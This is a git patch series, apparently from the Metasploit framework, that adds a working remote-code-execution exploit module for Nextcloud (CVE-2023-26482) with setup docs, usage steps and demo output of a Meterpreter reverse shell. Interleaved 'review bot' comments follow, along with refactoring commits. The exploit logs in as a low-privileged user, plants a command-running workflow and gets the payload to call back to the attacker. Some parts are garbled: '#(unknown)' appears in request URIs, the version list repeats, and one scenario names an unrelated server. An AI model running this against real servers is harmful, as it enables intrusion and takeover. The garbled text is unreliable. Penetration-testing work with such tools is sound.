From e819362398f61ca8ab156bfb3b8c7a5209f54aa1 Mon Sep 17 00:00:00 2001 From: jenkins-metasploit Date: Wed, 9 Apr 2025 11:24:47 +0000 Subject: [PATCH 01/27] automatic module_metadata_base.json update --- .../unix/webapp/nextcloud_workflows_rce.md | 149 ++++++++++ .../unix/webapp/nextcloud_workflows_rce.rb | 267 ++++++++++++++++++ 2 files changed, 416 insertions(+) create mode 100644 documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md create mode 100644 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb diff --git a/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md new file mode 100644 index 0000000000000..d69c15c02b817 --- /dev/null +++ b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md 
@@ -0,0 +1,149 @@ +## Description + +This module exploits a command injection that leads to a remote execution in Nextcloud installations if the app Workflow External Scripts is also installed. +The vulnerability affects Nextcloud versions >= 24.0.0, >= 25.0.0, >= 18.0.0, >= 19.0.0, >= 20.0.0, >= 21.0.0, >= 22.0.0, >= 23.0.0, >= 24.0.0, >= 25.0.0 + +A missing scope validation allowed users to create workflows which are designed to be only available for administrators. In combination with Workflow External Script, this vulnerability +leads to authenticated remote command execution. + +More about the vulnerability detail: [CVE-2023-26482](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-26482). + +The module will automatically use `cmd/linux/http/x64/meterpreter/reverse_tcp` payload. + +The module will check if the target is vulnerable, by adding and removing a dummy-workflow. + + +## Vulnerable Application + +[Nextcloud](https://nextcloud.com/) is a suite of client-server software for creating and using file hosting services. 
+ +This module has been tested successfully on Nextcloud versions: + +* Nextcloud version 24.0.5 + +### Source and Installers + +* [Source Code Repository](https://github.com/nextcloud/server/releases/tag/v24.0.5) +* [Docker](https://hub.docker.com/_/nextcloud) + +### Docker Installation + +This exploit was tested using a [nextcloud docker container](https://hub.docker.com/_/nextcloud) and [docker-compose](https://docs.docker.com/compose/) +with the following docker-compose.yml: + +```yaml +volumes: + nextcloud: + db: + +services: + db: + image: mariadb:10.6 + restart: always + command: --transaction-isolation=READ-COMMITTED --log-bin=binlog --binlog-format=ROW + volumes: + - db:/var/lib/mysql + environment: + - MARIADB_ROOT_PASSWORD=root + - MARIADB_PASSWORD=root + - MARIADB_DATABASE=nextcloud + - MARIADB_USER=nextcloud + + app: + image: nextcloud:24.0.5 + restart: always + ports: + - 8080:80 + links: + - db + environment: + - MYSQL_PASSWORD=root + - MYSQL_DATABASE=nextcloud + - MYSQL_USER=root + - MYSQL_HOST=db + - NEXTCLOUD_ADMIN_PASSWORD=admin + - NEXTCLOUD_ADMIN_USER=admin + - NEXTCLOUD_TRUSTED_DOMAINS="192.168.233.64:8080" + depends_on: + - db +``` + +**_NOTE:_** Change the IP-address and port for NEXTCLOUD_TRUSTED_DOMAINS for your setup + +After `docker compose up -d` login as admin and install the workflow app: "Workflow external script" and +create a low privileged user `alice`. Make sure that you choose "Cron(Recommended)" in the Settings for "Background Jobs". +Before we can run the exploit, we need to start the cronjob. This is crucial because otherwise the +payload doesn't get triggered: + +``` +docker exec -it -u www-data nextcloud-app-1 /bin/bash` +watch -n2 php cron.php +``` + +Wait until you the watch-command outputs something like: "Every 2.0s: php cron.php". + +## Verification Steps +Example steps in this format (is also in the PR): + +1. Do: `use exploit/unix/webapp/nextcloud_workflows_rce` +2. Do: `set RHOSTS [ips]` +3. 
Do: `set LHOST [lhost]` +4. Do: `set RPORT 8080` +5. Do: `set USERNAME alice` +6. Do: `set PASSWORD alice-password` +7. Do: `run` +8. You should get a shell after a while + +## Options + +### TARGETURI + +Remote web path to the nextcloud installation (default: /) + +### ListenerTimeout + +Number of seconds to wait for the exploit to connect back (default: 960) + +### USERNAME + +The low-privileged username to authenticate to nextcloud + +### PASSWORD + +The password for the low-privileged user + +## Scenarios + +In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP address of the metasploit host is +192.42.1.188. + +### Nextcloud 24.0.5(docker-compose) + +The following demo shows how to use the exploit: + +``` +msf6 > use exploit/unix/webapp/nextcloud_workflows_rce +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set RHOSTS 192.168.233.64 +RHOSTS => 192.168.233.64 +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set LHOST 192.168.233.117 +LHOST => 192.168.233.117 +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set RPORT 8080 +RPORT => 8080 +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set USERNAME alice +USERNAME => alice +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set PASSWORD CaeD4ohchaiv5ieDooBa +PASSWORD => CaeD4ohchaiv5ieDooBa +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > run +[*] Started reverse TCP handler on 192.168.233.117:4444 +[*] Sending payload.. +[+] Workflow created +[*] Waiting for the payload to connect back .. +[*] Sending stage (3045380 bytes) to 192.168.233.64 +[*] Meterpreter session 1 opened (192.168.233.117:4444 -> 192.168.233.64:37090) at 2025-04-10 13:27:49 +0000 +[+] Payload connected! +[*] Cleaning up + +meterpreter > getuid +Server username: www-data +``` 
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
new file mode 100644
index 0000000000000..2663e01707655
--- /dev/null
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -0,0 +1,267 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ @token = nil
+
+ super(
+ update_info(
+ info,
+ 'Name' => 'Nextcloud Workflows Remote Code Execution',
+ 'Description' => %q{
+ This module adds workflows as an authenticated user
+ which can only be created by administrators by design.
+ If the app "Nextcloud Workflow Script" is installed it
+ is possible to generate a workflow that executes commands.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Enis Maholli', # Discovery
+ 'arianitisufi', # Discovery
+ 'Armend Gashi', # Discovery
+ 'whotwagner' # Metasploit Module
+ ],
+ 'References' => [
+ ['URL', 'https://github.com/nextcloud/security-advisories/security/advisories/GHSA-h3c9-cmh8-7qpj'],
+ ['CVE', '2023-26482']
+ ],
+ 'Platform' => %w[linux unix],
+ 'Targets' => [
+ [
+ 'nix Command',
+ {
+ 'Platform' => %w[unix linux],
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_cmd,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+ 'FETCH_WRITABLE_DIR' => '/tmp'
+ }
+ }
+ ],
+ [
+ 'Linux (Dropper)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X64],
+ 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+ 'Type' => :linux_dropper
+ }
+ ]
+ ],
+ 'CmdStagerFlavor' => %w[bourne curl wget printf echo],
+ 'Privileged' => false,
+ 'DisclosureDate' => '2023-03-30',
+ 'DefaultTarget' => 0,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+ }
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'Path to nextcloud', '/']),
+ OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit to connect back', 960]),
+ OptString.new('USERNAME', [true, 'The username to authenticate as']),
+ OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+ ]
+ )
+ end
+
+ def parse_token(res)
+ return if res.nil?
+
+ if defined? res.get_html_document.at('//head/@data-requesttoken').value
+ Rex::Text.uri_encode(res.get_html_document.at('//head/@data-requesttoken').value)
+ else
+ print_error('token not found')
+ nil
+ end
+ end
+
+ def authenticate(user, pass)
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'login'),
+ 'method' => 'GET',
+ 'keep_cookies' => true
+ )
+
+ @token = parse_token(res)
+ fail_with(Failure::Unreachable, 'Request Token not found') if @token.nil?
+
+ data = "user=#{user}&password=#{pass}&requesttoken=#{@token}"
+
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'login'),
+ 'method' => 'POST',
+ 'data' => data.to_s,
+ 'keep_cookies' => true
+ )
+
+ fail_with(Failure::Unreachable, 'Login failed') if res.nil? || res.code == 401
+ end
+
+ def request_token
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'csrftoken'),
+ 'method' => 'GET',
+ 'keep_cookies' => true
+ )
+
+ @token = JSON.parse(res.body)['token']
+ fail_with(Failure::Unreachable, '2: Request Token not found') if @token.nil?
+ end
+
+ def create_workflow(operation)
+ flow_id = nil
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'ocs/v2.php/apps/workflowengine/api/v1/workflows/user'),
+ 'method' => 'POST',
+ 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'application/json' },
+ 'vars_get' => { 'format' => 'json' },
+ 'data' => {
+ 'id' => -1743078702939,
+ 'class' => 'OCA\\WorkflowScript\\Operation',
+ 'entity' => 'OCA\\WorkflowEngine\\Entity\\File',
+ 'events' => ['\\OCP\\Files::postCreate', '\\OCP\\Files::postWrite', '\\OCP\\Files::postTouch'],
+ 'name' => '',
+ 'checks' => [
+ {
+ 'class' => 'OCA\\WorkflowEngine\\Check\\FileName',
+ 'operator' => 'matches',
+ 'value' => '/.*/',
+ 'invalid' => false
+ }
+ ],
+ 'operation' => operation,
+ 'valid' => true
+ }.to_json,
+ 'keep_cookies' => true
+ )
+
+ fail_with(Failure::Unreachable, 'Unable to create workflow') if res.nil?
+
+ fail_with(Failure::Unreachable, 'Login failed') if res.code == 401
+
+ if res.code == 200
+ json_data = JSON.parse(res.body)
+ flow_id = json_data['ocs']['data']['id']
+ end
+ flow_id
+ end
+
+ def upload_file(filename)
+ send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, "remote.php/webdav/#(unknown)"),
+ 'method' => 'PUT',
+ 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'text/plain ' }
+ )
+ end
+
+ def delete_workflow(workflow_id)
+ url = "ocs/v2.php/apps/workflowengine/api/v1/workflows/user/#{workflow_id}"
+ send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, url),
+ 'vars_get' => { 'format' => 'json' },
+ 'method' => 'DELETE',
+ 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'application/json' },
+ 'keep_cookies' => true
+ )
+ end
+
+ def delete_file(user, filename)
+ send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, "remote.php/dav/files/#{user}/#(unknown)"),
+ 'method' => 'DELETE',
+ 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'text/plain ' }
+ )
+ end
+
+ # At the end of the module, especially for reverse_tcp payloads, wait for
+ # the payload to connect back to us. There's a very high probability we
+ # will lose the payload's signal otherwise.
+ #
+ # copied from: linux/http/huawei_hg532n_cmdinject.rb
+ #
+ def wait_for_payload_session
+ print_status 'Waiting for the payload to connect back ..'
+ begin
+ Timeout.timeout(datastore['ListenerTimeout']) do
+ loop do
+ break if session_created?
+
+ Rex.sleep(0.25)
+ end
+ end
+ rescue ::Timeout::Error
+ fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back')
+ end
+ print_good 'Payload connected!'
+ end
+
+ def check
+ # For the check command
+ cookie_jar.clear
+
+ authenticate(datastore['USERNAME'], datastore['PASSWORD'])
+ request_token
+ flow_id = create_workflow('sleep 1')
+
+ Exploit::CheckCode::Safe('Target is not vulnerable') if flow_id.nil?
+
+ delete_workflow(flow_id)
+ Exploit::CheckCode::Vulnerable
+ end
+
+ def exploit
+ # Main function
+ cookie_jar.clear
+
+ authenticate(datastore['USERNAME'], datastore['PASSWORD'])
+
+ request_token
+
+ case target['Type']
+ when :unix_cmd
+ execute_command(payload.encoded)
+ when :linux_dropper
+ execute_cmdstager
+ end
+ end
+
+ def execute_command(cmd, _opts = {})
+ print_status('Sending payload..')
+ temp_filename = "#{Rex::Text.rand_text_alpha(5..10)}..txt"
+ flow_id = create_workflow(cmd.to_s)
+
+ fail_with(Failure::Unreachable, 'Unable to create workflow') if flow_id.nil?
+
+ print_good('Workflow created')
+
+ Thread.new do
+ # wait a bit until wait_for_payload_session
+ # is up'n'running
+ Rex::ThreadSafe.sleep(10)
+ upload_file(temp_filename)
+ end
+
+ wait_for_payload_session
+
+ if flow_id
+ print_status('Cleaning up')
+ delete_workflow(flow_id)
+ end
+
+ delete_file(datastore['USERNAME'], temp_filename)
+ end
+end
From e6781e60f0d7b2a2bc09ac27dfe2f7bd870d91b9 Mon Sep 17 00:00:00 2001
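Review bot: In `check`, `Exploit::CheckCode::Safe('Target is not vulnerable') if flow_id.nil?` is evaluated and its value thrown away, so a nil `flow_id` still falls through to `delete_workflow(nil)` and the method reports Vulnerable; it needs an early exit, `return Exploit::CheckCode::Safe('Target is not vulnerable') if flow_id.nil?`. `authenticate` also builds the login body by interpolating the raw credentials into `"user=#{user}&password=#{pass}&requesttoken=#{@token}"`, so a password containing `&`, `+` or `%` is mangled on the wire; passing `'vars_post' => { 'user' => user, 'password' => pass, 'requesttoken' => @token }` lets the HTTP client encode each field (and `parse_token` would then return the raw attribute instead of `Rex::Text.uri_encode`-ing it). The `'Content-Type' => 'text/plain '` header value in `upload_file` and `delete_file` carries a trailing space. `check` registers a real workflow (`'sleep 1'`) on the target before deleting it again, which deserves a comment above the method, e.g. `# Creating and removing a dummy workflow is the only reliable test; it leaves a trace in the target's workflow/audit logs`.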
From: whotwagner
Date: Fri, 11 Apr 2025 12:42:50 +0000
Subject: [PATCH 02/27] Changed ranking to Excellent
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 2663e01707655..53c6cf7048b79 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -4,7 +4,7 @@
 ##
 class MetasploitModule < Msf::Exploit::Remote
- Rank = NormalRanking
+ Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpClient
From 5f42b3439ef4f55ea0a2e40f9193061ee118d013 Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Tue, 15 Apr 2025 13:02:25 +0200
Subject: [PATCH 03/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: Diego Ledda
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 53c6cf7048b79..1c8b902498832 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -81,7 +81,7 @@ def initialize(info = {})
 def parse_token(res)
 return if res.nil?
- if defined? res.get_html_document.at('//head/@data-requesttoken').value
+ if defined? res.get_html_document&.at('//head/@data-requesttoken').value
 Rex::Text.uri_encode(res.get_html_document.at('//head/@data-requesttoken').value)
 else
 print_error('token not found')
From 4a08b935429d1104c66d35283cc1ad19353e4656 Mon Sep 17 00:00:00 2001
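Review bot: The `defined?` test in `parse_token` is standing in for a nil check — it only yields nil because `NilClass` has no `value` method — and the same XPath lookup is then evaluated a second time inside the `if` body; patch 07 touches the same line again by adding `&.value`, which makes the meaning of `defined?` on a safe-navigated call even less obvious to a reader. Read the attribute once into a local, `token = res.get_html_document&.at('//head/@data-requesttoken')&.value`, then `print_error('token not found')` and return nil when `token` is nil, and otherwise return `Rex::Text.uri_encode(token)`. The method's closing lines are outside this hunk.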
From: whotwagner
Date: Tue, 15 Apr 2025 13:02:46 +0200
Subject: [PATCH 04/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: Diego Ledda
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 1c8b902498832..864e827c40bba 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -154,7 +154,7 @@ def create_workflow(operation)
 fail_with(Failure::Unreachable, 'Login failed') if res.code == 401
 if res.code == 200
- json_data = JSON.parse(res.body)
+ json_data = res.get_json_document
 flow_id = json_data['ocs']['data']['id']
 end
 flow_id
From 14daed78b2a6c3c7a52988a376935b486e1ed072 Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Tue, 15 Apr 2025 13:03:09 +0200
Subject: [PATCH 05/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: Diego Ledda
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 864e827c40bba..8a0e625c1f8a8 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -155,7 +155,7 @@ def create_workflow(operation)
 if res.code == 200
 json_data = res.get_json_document
- flow_id = json_data['ocs']['data']['id']
+ flow_id = json_data.dig('ocs', 'data', 'id')
 end
 flow_id
 end
From 2245516a2174bf051bfbaa566d1da583025274d0 Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Tue, 15 Apr 2025 13:03:54 +0200
Subject: [PATCH 06/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: msutovsky-r7
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 8a0e625c1f8a8..9716b463b92bd 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -169,9 +169,8 @@ def upload_file(filename)
 end
 def delete_workflow(workflow_id)
- url = "ocs/v2.php/apps/workflowengine/api/v1/workflows/user/#{workflow_id}"
 send_request_cgi(
- 'uri' => normalize_uri(target_uri.path, url),
+ 'uri' => normalize_uri(target_uri.path, "ocs/v2.php/apps/workflowengine/api/v1/workflows/user/#{workflow_id}"),
 'vars_get' => { 'format' => 'json' },
 'method' => 'DELETE',
 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'application/json' },
From b1e3b0708eca29fe56143adf9cc18f54f9249e8c Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Tue, 15 Apr 2025 11:11:29 +0000
Subject: [PATCH 07/27] Fixed get_html_document in parse_tokens
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 9716b463b92bd..bd6c473f3ea66 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -81,7 +81,7 @@ def initialize(info = {})
 def parse_token(res)
 return if res.nil?
- if defined? res.get_html_document&.at('//head/@data-requesttoken').value
+ if defined? res.get_html_document&.at('//head/@data-requesttoken')&.value
 Rex::Text.uri_encode(res.get_html_document.at('//head/@data-requesttoken').value)
 else
 print_error('token not found')
From fde19395cec939d48c937015e0d835392123a934 Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Tue, 15 Apr 2025 14:41:40 +0200
Subject: [PATCH 08/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: Diego Ledda
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index bd6c473f3ea66..62f0a4d27f0a4 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -118,7 +118,7 @@ def request_token
 'keep_cookies' => true
 )
- @token = JSON.parse(res.body)['token']
+ @token = res.get_json_document['token']
 fail_with(Failure::Unreachable, '2: Request Token not found') if @token.nil?
 end
From 5a75e0bb2d7716d839144dadab366e3a2e81ba67 Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Tue, 15 Apr 2025 12:55:33 +0000
Subject: [PATCH 09/27] Reformatting res.code for login-failure
---
 .../exploits/unix/webapp/nextcloud_workflows_rce.rb | 10 +++-------
 1 file changed, 3 insertions(+), 7 deletions(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 62f0a4d27f0a4..93ae77ef8f013 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
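Review bot: `@token = res.get_json_document['token']` in `request_token` dereferences `res` without a nil check, so a dropped connection on the `csrftoken` request surfaces as a NoMethodError instead of a module failure; add `fail_with(Failure::Unreachable, 'No response from csrftoken endpoint') if res.nil?` before it. The message `'2: Request Token not found'` also carries a stray `2:` prefix that reads like a debugging leftover. The request at the top of `request_token` is outside this hunk.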
@@ -123,7 +123,6 @@ def request_token
 end
 def create_workflow(operation)
- flow_id = nil
 res = send_request_cgi(
 'uri' => normalize_uri(target_uri.path, 'ocs/v2.php/apps/workflowengine/api/v1/workflows/user'),
 'method' => 'POST',
@@ -151,12 +150,9 @@ def create_workflow(operation)
 fail_with(Failure::Unreachable, 'Unable to create workflow') if res.nil?
- fail_with(Failure::Unreachable, 'Login failed') if res.code == 401
-
- if res.code == 200
- json_data = res.get_json_document
- flow_id = json_data.dig('ocs', 'data', 'id')
- end
+ fail_with(Failure::Unreachable, 'Login failed') unless res.code != 200
+ json_data = res.get_json_document
+ flow_id = json_data.dig('ocs', 'data', 'id')
 flow_id
 end
From 92e30b8391503f69336fdc1738221d5d83a8fe2a Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Tue, 15 Apr 2025 15:06:33 +0200
Subject: [PATCH 10/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: msutovsky-r7
---
 .../unix/webapp/nextcloud_workflows_rce.rb | 14 ++++----------
 1 file changed, 4 insertions(+), 10 deletions(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 93ae77ef8f013..116739a26bad6 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -190,17 +190,11 @@ def delete_file(user, filename)
 #
 def wait_for_payload_session
 print_status 'Waiting for the payload to connect back ..'
- begin
- Timeout.timeout(datastore['ListenerTimeout']) do
- loop do
- break if session_created?
-
- Rex.sleep(0.25)
- end
+ created = retry_until_truthy(timeout: datastore['ListenerTimeout']) do
+ session_created?
+ Rex.sleep(0.25)
 end
- rescue ::Timeout::Error
- fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back')
- end
+ fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back') unless created
 print_good 'Payload connected!'
 end
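Review bot: With the `flow_id = nil` initialisation gone, the `json_data` local and the trailing bare `flow_id` in `create_workflow` are now pure ceremony; the last three lines of the second hunk reduce to `res.get_json_document.dig('ocs', 'data', 'id')`. The condition `unless res.code != 200` added in the same hunk is inverted (it aborts exactly when the request succeeded); the series corrects it in patch 11, so this is a note for bisectability rather than a request. The request at the top of `create_workflow` is outside this hunk.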
From d0a3eb43326710b22d95f0291816a65fc0d940c7 Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Tue, 15 Apr 2025 13:25:25 +0000
Subject: [PATCH 11/27] Fixed refacturing-bugs
---
 .../exploits/unix/webapp/nextcloud_workflows_rce.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 116739a26bad6..ce323feb7573b 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Retry
 def initialize(info = {})
 @token = nil
@@ -150,7 +151,7 @@ def create_workflow(operation)
 fail_with(Failure::Unreachable, 'Unable to create workflow') if res.nil?
- fail_with(Failure::Unreachable, 'Login failed') unless res.code != 200
+ fail_with(Failure::Unreachable, 'Login failed') unless res.code == 200
 json_data = res.get_json_document
 flow_id = json_data.dig('ocs', 'data', 'id')
 flow_id
@@ -190,11 +191,10 @@ def delete_file(user, filename)
 #
 def wait_for_payload_session
 print_status 'Waiting for the payload to connect back ..'
- created = retry_until_truthy(timeout: datastore['ListenerTimeout']) do
- session_created?
- Rex.sleep(0.25)
- end
- fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back') unless created
+ created = retry_until_truthy(timeout: datastore['ListenerTimeout']) do
+ session_created?
+ end
+ fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back') unless created
 print_good 'Payload connected!'
 end
From 4a5d556671cdff50d255183bdfe652a25c45619b Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Thu, 24 Apr 2025 12:20:41 +0000
Subject: [PATCH 12/27] Removed linux_dropper from exploit_nextcloud_workflows
---
 .../exploits/unix/webapp/nextcloud_workflows_rce.rb | 12 ------------
 1 file changed, 12 deletions(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index ce323feb7573b..3aef273564fbd 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -47,17 +47,7 @@ def initialize(info = {})
 }
 }
 ],
- [
- 'Linux (Dropper)',
- {
- 'Platform' => 'linux',
- 'Arch' => [ARCH_X64],
- 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
- 'Type' => :linux_dropper
- }
- ]
 ],
- 'CmdStagerFlavor' => %w[bourne curl wget printf echo],
 'Privileged' => false,
 'DisclosureDate' => '2023-03-30',
 'DefaultTarget' => 0,
@@ -223,8 +213,6 @@ def exploit
 case target['Type']
 when :unix_cmd
 execute_command(payload.encoded)
- when :linux_dropper
- execute_cmdstager
 end
 end
From c9521a0eabddbb0d0e1db59df0fa58dc9adefcdc Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Thu, 24 Apr 2025 12:29:18 +0000
Subject: [PATCH 13/27] Removed thread from exploit_nextcloud_workflows
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 8 +-------
 1 file changed, 1 insertion(+), 7 deletions(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 3aef273564fbd..1eaef404617a1 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
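Review bot: Dropping the second target leaves a trailing comma on the remaining element of `'Targets'` — the context now reads `],` immediately followed by `],` — which RuboCop's Style/TrailingCommaInArrayLiteral is likely to flag under the framework's lint config; the inner `],` should become `]`. In the second hunk `case target['Type']` is left with a single `when :unix_cmd` arm, so `exploit` can simply end with `execute_command(payload.encoded)` and the `case` can go. With only one target left, the module-level `'Platform' => %w[linux unix]` and the target's `'Platform' => %w[unix linux]` now say the same thing twice; keeping one of them avoids future drift. The rest of `initialize` and of `exploit` lies outside these hunks.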
@@ -224,13 +224,7 @@ def execute_command(cmd, _opts = {})
 fail_with(Failure::Unreachable, 'Unable to create workflow') if flow_id.nil?
 print_good('Workflow created')
-
- Thread.new do
- # wait a bit until wait_for_payload_session
- # is up'n'running
- Rex::ThreadSafe.sleep(10)
- upload_file(temp_filename)
- end
+ upload_file(temp_filename)
 wait_for_payload_session
From 6aa2170fbc43b34b86f3fda25cf2ec96dad98365 Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Mon, 5 May 2025 13:21:33 +0000
Subject: [PATCH 14/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: msutovsky-r7
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
